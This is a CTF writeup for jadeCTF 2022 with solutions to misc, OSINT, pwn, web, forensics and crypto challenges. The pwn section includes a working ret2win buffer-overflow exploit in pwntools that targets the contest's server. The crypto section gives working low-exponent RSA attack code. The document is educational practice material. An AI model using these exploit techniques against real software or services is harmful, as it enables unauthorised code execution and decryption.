Jade CTF Writeup

This contest ran from 2022/10/21 15:30 (JST) to 2022/10/23 15:30 (JST).
I took part as a team again. We finished 142nd out of 629 teams with 500 points.
Below are writeups for the challenges I solved myself.

WELCOME (MISC)

Base64-decode the given string.

$ echo amFkZUNURnt3M2xjMG0zX3QwX2o0ZGVfY3RmfQo= | base64 -d
jadeCTF{w3lc0m3_t0_j4de_ctf}
jadeCTF{w3lc0m3_t0_j4de_ctf}

READ THE RULES (MISC)

The flag was written on the rules page in a transparent (invisible) text color; selecting the page text reveals it.

jadeCTF{R34D_73H_RuL32}

HERITAGE (OSINT)

The challenge asks three questions about the place in the photo:

Whenever I look at this picture, three questions come to my mind.

1. What are those protruding like structures?
2. What is this place?
3. How old are they?

A reverse image search focused on the protruding structures shows they are petrified wood, and the place is the Oval Ground. Searching further for "iit garden Petrified wood age" turns up the following text:

It is famous for a 2.5 million years old 
jadectf{Petrified_Wood_Oval_Ground_2500000}

BABY PWN (PWN)

$ file chall
chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9102a90681079c7c798825becb1be0a1851ff292, not stripped

$ checksec.sh --file ./chall
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    Not an ELF file   No RPATH   No RUNPATH   ./chall

Decompiling with Ghidra gives:

undefined8 main(void)

{
  setvbuf(stdout,(char *)0x0,2,0);
  setvbuf(stdin,(char *)0x0,1,0);
  start_program();
  return 0;
}

void start_program(void)

{
  char local_208 [512];
  
  puts("Enter your name:");
  gets(local_208);
  printf("Hello %s, welcome to jadeCTF!\n",local_208);
  return;
}

void win(void)

{
  char local_78 [104];
  FILE *local_10;
  
  puts("Nice job :)");
  local_10 = fopen("flag.txt","r");
  if (local_10 == (FILE *)0x0) {
    puts("Sorry, flag doesn\'t exist.");
                    /* WARNING: Subroutine does not return */
    exit(0);
  }
  fgets(local_78,100,local_10);
  printf("Here is your flag: %s\n",local_78);
  return;
}
$ gdb -q ./chall
Reading symbols from ./chall...
(No debugging symbols found in ./chall)
gdb-peda$ pattc 600
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs'
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/chall 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Enter your name:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs
Hello AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs, welcome to jadeCTF!

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x274 
RBX: 0x0 
RCX: 0x7ffff7e92a37 (<__GI___libc_write+23>:	cmp    rax,0xfffffffffffff000)
RDX: 0x0 
RSI: 0x7fffffffbc90 ("Hello AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZA"...)
RDI: 0x7fffffffbb70 --> 0x7ffff7de00d0 (<__funlockfile>:	endbr64)
RBP: 0x4e73413873416973 ('siAs8AsN')
RSP: 0x7fffffffdfb8 ("AsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs")
RIP: 0x4007f8 (<start_program+68>:	ret)
R8 : 0x274 
R9 : 0x7fffffff 
R10: 0x0 
R11: 0x246 
R12: 0x7fffffffe0d8 --> 0x7fffffffe3ed ("/mnt/hgfs/Shared/chall")
R13: 0x4007f9 (<main>:	push   rbp)
R14: 0x0 
R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4007f1 <start_program+61>:	call   0x4005d0 <printf@plt>
   0x4007f6 <start_program+66>:	nop
   0x4007f7 <start_program+67>:	leave  
=> 0x4007f8 <start_program+68>:	ret    
   0x4007f9 <main>:	push   rbp
   0x4007fa <main+1>:	mov    rbp,rsp
   0x4007fd <main+4>:	mov    rax,QWORD PTR [rip+0x20086c]        # 0x601070 <stdout@@GLIBC_2.2.5>
   0x400804 <main+11>:	mov    ecx,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdfb8 ("AsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs")
0008| 0x7fffffffdfc0 ("OAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs")
0016| 0x7fffffffdfc8 ("slAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs")
0024| 0x7fffffffdfd0 ("AsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs")
0032| 0x7fffffffdfd8 ("SAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs")
0040| 0x7fffffffdfe0 ("sqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs")
0048| 0x7fffffffdfe8 ("AsVAstAsWAsuAsXAsvAsYAswAsZAsxAs")
0056| 0x7fffffffdff0 ("WAsuAsXAsvAsYAswAsZAsxAs")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004007f8 in start_program ()
gdb-peda$ patto AsjAs9As
AsjAs9As found at offset: 520

The return address is overwritten at offset 520, i.e. the 512-byte buffer plus the 8-byte saved rbp. With no canary and no PIE this is a plain stack overflow: 520 bytes of filler followed by the address of win. One caveat for this kind of return-to-win: after the extra return the stack is 8 bytes off its 16-byte alignment, so if win crashes on a movaps inside fopen or printf, a single ret gadget in front of win's address fixes it. It was not needed here.

#!/usr/bin/env python3
from pwn import *

# no argument: attack the remote service; any argument: run the local binary
if len(sys.argv) == 1:
    p = remote('34.76.206.46', 10002)
else:
    p = process('./chall')

elf = ELF('./chall')

win_addr = elf.symbols['win']   # no PIE, so the symbol address is the runtime address

# 512-byte buffer + 8-byte saved rbp = 520 bytes up to the return address
payload = b'A' * 520
payload += p64(win_addr)

data = p.recvline().rstrip()     # "Enter your name:"
print(data)
print(payload)
p.sendline(payload)              # gets() only stops at the newline, NUL bytes are fine
data = p.recvline().rstrip()     # "Hello ..., welcome to jadeCTF!"
print(data)

for _ in range(2):               # "Nice job :)" and the flag line printed by win()
    data = p.recvline().decode().rstrip()
    print(data)

Running it gives:

[+] Opening connection to 34.76.206.46 on port 10002: Done
[*] '/mnt/hgfs/Shared/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
b'Enter your name:'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF\x07@\x00\x00\x00\x00\x00'
b'Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF\x07@, welcome to jadeCTF!'
Nice job :)
Here is your flag: jadeCTF{buff3r_0v3rfl0ws_4r3_d4ng3r0u5}
[*] Closed connection to 34.76.206.46 port 10002
jadeCTF{buff3r_0v3rfl0ws_4r3_d4ng3r0u5}

ULTRA BABY WEB (WEB)

Set the cookie user=admin and request the page.

$ curl -b 'user=admin' http://34.76.206.46:10010/
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ultra Baby Web</title>
    <link rel="shortcut icon" href="oswap.png" type="image/png">
    <link rel="stylesheet" href="index.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Rubik:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
</head>
<body>
    <header>
        <div class="title">
            Ultra Baby Web
        </div>
        <div class="level-title">
        Ultra Baby Web
        </div>
    </header>
    <main>
        <div class="container">
            <div class="container__title">
                Ultra Baby Web
            </div>
            <div class="wrapper">
                <div class="wrapper__title">
                    My grandma makes the best cookies xD
                </div>
                <div class="wrapper__description">
                <center><img src="cookies.png" height=30% width=80%></center>
                <br>
                <center><h1>jadeCTF{my_l0v3_f0r_c00k1es_1s_n3ver_end1ng}</h1><center>                </div>
            </div>
        </div>
    </main>
</body>
</html>
jadeCTF{my_l0v3_f0r_c00k1es_1s_n3ver_end1ng}

LM10 (DFIR)

Filter on http. Packet No. 258 is a GET /random.png request and the image comes back in the response; extract it (e.g. Wireshark's File > Export Objects > HTTP) and the flag is written on the image.

jctf{No_doubt_he's_the_best_in_the world}

AUTOCAD (DFIR)

The width and height in the IHDR chunk have been tampered with while the chunk's CRC was left intact, so brute-force both values until the IHDR CRC matches the stored one.

#!/usr/bin/env python3
import struct
import binascii

with open('poster.png', 'rb') as f:
    data = f.read()

# PNG layout: 8-byte signature, then the IHDR chunk:
#   [8:12]  length (13)     [12:16] type "IHDR"
#   [16:20] width           [20:24] height
#   [24:29] bit depth, colour type, compression, filter, interlace
#   [29:33] CRC over type + data (the length is not covered)
head = data[:12]
tail = data[29:]

found = False
for h in range(1, 512):
    for w in range(1, 1024):
        width = struct.pack('>I', w)
        height = struct.pack('>I', h)
        ihdr = data[12:16] + width + height + data[24:29]
        crc = struct.pack('!I', binascii.crc32(ihdr))
        if crc == data[29:33]:   # stored CRC still matches the original dimensions
            found = True
            out = head + ihdr + tail
            with open('poster_fix.png', 'wb') as f:
                f.write(out)
            break
    if found:
        break

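As an added example (my own code, not the challenge script above), here is a more general form of the same fix: it walks the PNG chunk list instead of relying on fixed offsets, reports every chunk whose CRC does not match, and brute-forces the IHDR width and height until the stored CRC is reproduced. The image it works on is constructed in memory so the block runs without poster.png; the search bounds and the 37x21 test size are assumptions.

```python
#!/usr/bin/env python3
"""Added example: generic PNG chunk walker plus IHDR dimension recovery.
The test image is constructed in memory; nothing here is the challenge file."""
import struct
import zlib

PNG_SIG = b'\x89PNG\r\n\x1a\n'


def iter_chunks(data):
    """Yield (offset, type, body, stored_crc) for each chunk in a PNG."""
    if data[:8] != PNG_SIG:
        raise ValueError('not a PNG (bad signature)')
    pos = 8
    while pos + 12 <= len(data):
        length, ctype = struct.unpack('>I4s', data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack('>I', data[pos + 8 + length:pos + 12 + length])
        yield pos, ctype, body, crc
        pos += 12 + length
        if ctype == b'IEND':
            break


def bad_crc_chunks(data):
    """Types of all chunks whose stored CRC does not match.
    The PNG CRC covers the type bytes and the body, not the length field."""
    return [ctype for _, ctype, body, crc in iter_chunks(data)
            if zlib.crc32(ctype + body) != crc]


def recover_ihdr_dims(data, max_w=4096, max_h=4096):
    """Brute-force (width, height) until the IHDR CRC matches the stored value.
    Returns None if nothing within the bounds matches."""
    for _, ctype, body, crc in iter_chunks(data):
        if ctype != b'IHDR':
            continue
        rest = body[8:]  # bit depth, colour type, compression, filter, interlace
        for h in range(1, max_h + 1):
            for w in range(1, max_w + 1):
                if zlib.crc32(b'IHDR' + struct.pack('>II', w, h) + rest) == crc:
                    return w, h
        return None
    raise ValueError('no IHDR chunk')


def patch_ihdr_dims(data, w, h):
    """Copy of the PNG with the IHDR width/height replaced; the CRC is left alone,
    which is also how the tampered challenge file was produced."""
    for off, ctype, _, _ in iter_chunks(data):
        if ctype == b'IHDR':
            start = off + 8  # body begins after length (4) + type (4)
            return data[:start] + struct.pack('>II', w, h) + data[start + 8:]
    raise ValueError('no IHDR chunk')


def _chunk(ctype, body):
    return (struct.pack('>I', len(body)) + ctype + body
            + struct.pack('>I', zlib.crc32(ctype + body)))


def make_test_png(w, h):
    """Constructed sample: an all-black 8-bit greyscale PNG of the given size."""
    ihdr = struct.pack('>IIBBBBB', w, h, 8, 0, 0, 0, 0)
    raw = b''.join(b'\x00' + b'\x00' * w for _ in range(h))  # filter byte + row
    return (PNG_SIG + _chunk(b'IHDR', ihdr)
            + _chunk(b'IDAT', zlib.compress(raw)) + _chunk(b'IEND', b''))


if __name__ == '__main__':
    good = make_test_png(37, 21)
    broken = patch_ihdr_dims(good, 1, 1)          # dimensions wrong, CRC untouched
    print('bad CRCs:', bad_crc_chunks(broken))
    dims = recover_ihdr_dims(broken, max_w=64, max_h=64)
    print('recovered:', dims)
    fixed = patch_ihdr_dims(broken, *dims)
    print('bad CRCs after fix:', bad_crc_chunks(fixed))
```

Against the challenge file, read poster.png into `data`, call recover_ihdr_dims with bounds large enough for a poster, and write patch_ihdr_dims(data, w, h) out. Each candidate has a 2^-32 chance of a spurious CRC match, so with millions of candidates it is worth confirming that the result actually decodes.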

Even with the image restored, no flag is visible in it. Opening it in StegSolve and looking at Green plane 4 shows the flag.

jctf{st3g_1s_easy_as_f**k}

HANDS (CRYPTO)

Searching for "hand signals" (sign language alphabet) turns up pages like the following with a letter chart:

https://fineartamerica.com/featured/vector-illustration-of-sign-language-basheera-designs.html?product=poster

Writing down the letter for each hand image gives:

JADECTFCRYP
TOISFUNORIS
IT
jadeCTF{CRYPTOISFUNORISIT}

BABY RSA (CRYPTO)

n is very large and e = 3 is tiny, so for a short unpadded message m^3 never wraps around the modulus: the ciphertext is literally m^3 over the integers and an integer cube root gives m back. This is the textbook low-public-exponent attack.

#!/usr/bin/env python3
from Crypto.PublicKey import RSA
from Crypto.Util.number import long_to_bytes
import gmpy2

c = 0x125eade3ceb41b6cf53f5edb012024e2049568540d0b833323bed4946d66487e1f03439592e5bf12430a44be9b8f84fb00f33e62b2e85d5b20e74c276d75cf443a06e2ca37e9907445d9dc03a3f35056b87f0a8eccd2f83f1eccab055c919065

with open('key.pem', 'r') as f:
    pub_data = f.read()

pubkey = RSA.importKey(pub_data)
n = pubkey.n
e = pubkey.e
# m**e < n, so c == m**e as an integer: take the exact e-th root
m, success = gmpy2.iroot(c, e)
assert success   # fails if the root is not exact, i.e. m**e did wrap around n
flag = long_to_bytes(m).decode()
print(flag)
jadeCTF{rs4_1s_s0_fr3ak1ng_3asy}
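As an added example (my own code, not the challenge script above), the same attack in pure Python without gmpy2 or PyCryptodome, generalised to the case where m^e is a little larger than n: then m^e = c + k*n for a small k, and trying successive k until c + k*n has an exact e-th root recovers m. The key and messages are constructed for the demo (a seeded Miller-Rabin key generator is included only so the block runs offline); none of it is the challenge's key.pem.

```python
#!/usr/bin/env python3
"""Added example: low-public-exponent attack with integer e-th roots,
extended to m**e = c + k*n for small k. Demo key and messages are constructed."""
import random


def iroot(x, e):
    """Integer e-th root by Newton's method.
    Returns (r, exact) with r = floor(x ** (1/e)) and exact = (r**e == x)."""
    if x < 0:
        raise ValueError('negative radicand')
    if x < 2:
        return x, True
    r = 1 << ((x.bit_length() + e - 1) // e)  # overestimate of the root
    while True:
        y = ((e - 1) * r + x // pow(r, e - 1)) // e
        if y >= r:
            return r, pow(r, e) == x
        r = y


def low_exponent_attack(c, n, e, max_k=10000):
    """Recover m from c = m**e mod n when m**e is below n (k = 0) or only a few
    multiples of n above it, i.e. m**e = c + k*n for small k. Returns (m, k) or None."""
    for k in range(max_k):
        r, exact = iroot(c + k * n, e)
        if exact:
            return r, k
    return None


def _is_probable_prime(n, rng, rounds=32):
    """Miller-Rabin; enough for a demo key, not a replacement for a real library."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def make_demo_key(bits=512, e=3, seed=2022):
    """Deterministic (seeded) demo modulus n = p*q with gcd(e, phi) = 1."""
    rng = random.Random(seed)
    primes = []
    while len(primes) < 2:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if (cand - 1) % e != 0 and _is_probable_prime(cand, rng):
            primes.append(cand)
    return primes[0] * primes[1], e


if __name__ == '__main__':
    n, e = make_demo_key()
    # Case 1 (the challenge): short message, m**3 < n, so c is m**3 over the integers.
    m = int.from_bytes(b'jadeCTF{constructed_demo}', 'big')
    m_rec, k = low_exponent_attack(pow(m, e, n), n, e)
    print(m_rec.to_bytes((m_rec.bit_length() + 7) // 8, 'big'), 'k =', k)
    # Case 2: m**3 slightly above n (between 5n and 6n), still recoverable with k = 5.
    m2 = iroot(5 * n, 3)[0] + 1
    print(low_exponent_attack(pow(m2, e, n), n, e) == (m2, 5))
```

For the challenge, replace make_demo_key with n and e read from key.pem as in the script above; with k = 0 it is exactly the cube root taken there. The k loop only helps for small k: once the message is long enough that m^e wraps many times, this is no longer a low-exponent problem.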